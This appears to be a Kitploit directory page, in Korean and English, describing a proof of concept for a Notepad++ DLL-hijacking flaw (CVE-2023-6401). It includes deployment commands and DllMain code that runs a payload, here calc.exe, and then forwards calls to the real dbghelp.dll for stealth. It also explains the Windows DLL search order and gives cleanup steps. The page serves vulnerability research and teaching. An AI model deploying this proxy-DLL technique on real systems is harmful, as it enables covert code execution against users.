Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-6401 — CVE-2023-6401은 공격자가 애플리케이션 디렉터리에 악성 `dbghelp.dll` 파일을 배치하여 임의 코드를 실행할 수 있게 하는 DLL 하이재킹 취약점입니다. 이 프로젝트는 해당 취약점을 시연하고 재현 가능한 PoC를 제공합니다. | Kitploit
도구/GitHubGitHub/mekitoci/cve-2023-6401
Vulnerability AnalysisExploitationLearning & EducationPayload DevelopmentBinary Exploitation
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401은 공격자가 애플리케이션 디렉터리에 악성 `dbghelp.dll` 파일을 배치하여 임의 코드를 실행할 수 있게 하는 DLL 하이재킹 취약점입니다. 이 프로젝트는 해당 취약점을 시연하고 재현 가능한 PoC를 제공합니다.

저장소 보기
171년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-6401 · DLL 하이재킹 개념 증명

License Platform

English | 한국어


한국어

⚠️ 중요 고지: 보안 연구 및 교육 목적으로만 사용하십시오

NotePad++ ≤ 8.1 DLL 하이재킹 취약점의 개념 증명(PoC)입니다. 애플리케이션 디렉토리에 악성 dbghelp.dll을 배치하여 임의 코드를 실행합니다.

빠른 시작

root@kitploit:~
# 프로젝트 다운로드
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 프로젝트 디렉토리로 이동
cd CVE-2023-6401-main

# DLL 컴파일
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# NotePad++ 디렉토리로 배포
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 테스트 실행
"C:\Program Files\Notepad++\notepad++.exe"

# 즉시 정리
del "C:\Program Files\Notepad++\dbghelp.dll"

예상 결과: 계산기 실행 + 메시지 상자 표시 + NotePad++ 정상 실행

PoC 결과

취약점 상세

항목세부 정보
CVE 번호CVE-2023-6401
영향 버전NotePad++ ≤ 8.1
취약점 유형DLL 하이재킹 / 검색 경로 하이재킹
영향임의 코드 실행
전제 조건애플리케이션 디렉토리 쓰기 권한

원리

Windows는 다음 순서로 DLL을 로드합니다:

  1. 애플리케이션 디렉토리 (최우선 순위)
  2. System32 디렉토리
  3. Windows 디렉토리
  4. 현재 디렉토리
  5. PATH 환경 변수

NotePad++ 시작 시 dbghelp.dll을 로드합니다. 애플리케이션 디렉토리에 동일한 이름의 악성 DLL을 배치하면 시스템 DLL 로드 전에 코드가 실행됩니다.

기술 구현

핵심 코드

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 악성 코드 실행
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 실제 DLL 로드 및 API 호출 전달
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

주요 특징

  • 검색 순서 하이재킹: Windows DLL 검색 메커니즘을 악용합니다.
  • API 전달: 실제 DLL을 로드하고 함수 호출을 전달하여 애플리케이션 정상 작동을 유지합니다.
  • 은폐성: 사용자가 이상을 감지하지 못합니다.

컴파일 옵션

MinGW (권장)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

정리

root@kitploit:~
# 악성 DLL 제거
del "C:\Program Files\Notepad++\dbghelp.dll"

# 제거 확인
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "정리 완료"

참고 자료

  • CVE-2023-6401
  • Microsoft DLL 검색 순서
  • MITRE ATT&CK T1574.001

면책 조항

본 프로젝트는 교육 및 보안 연구 목적으로만 제공됩니다. 사용자는 관련 법률 및 규정을 준수할 전적인 책임이 있습니다.


English

⚠️ IMPORTANT DISCLAIMER: For security research and educational purposes only

Proof-of-concept for NotePad++ ≤ 8.1 DLL hijacking vulnerability. Execute arbitrary code by placing a malicious dbghelp.dll in the application directory.

Quick Start

root@kitploit:~
# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

Expected Result: Calculator pops up + Message box displays + NotePad++ starts normally

PoC result

Vulnerability Details

ItemDetails
CVE NumberCVE-2023-6401
Affected VersionsNotePad++ ≤ 8.1
Vulnerability TypeDLL Hijacking / Search Order Hijacking
ImpactArbitrary Code Execution
PrerequisitesWrite permission to application directory

Mechanism

Windows loads DLLs in the following order:

  1. Application directory (highest priority)
  2. System32 directory
  3. Windows directory
  4. Current directory
  5. PATH environment variable

NotePad++ loads dbghelp.dll on startup. By placing a malicious DLL with the same name in the application directory, code can be executed before the system DLL is loaded.

Technical Implementation

Core Code

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Key Features

  • Search Order Hijacking: Exploits Windows DLL search mechanism
  • API Forwarding: Loads real DLL and forwards function calls to maintain normal application operation
  • Stealth: Users notice no abnormalities

Compilation Options

MinGW (Recommended)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Cleanup

root@kitploit:~
# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

References

  • CVE-2023-6401
  • Microsoft DLL Search Order
  • MITRE ATT&CK T1574.001

Disclaimer

This project is for educational and security research purposes only. Users are solely responsible for compliance with applicable laws and regulations.

도구 다운로드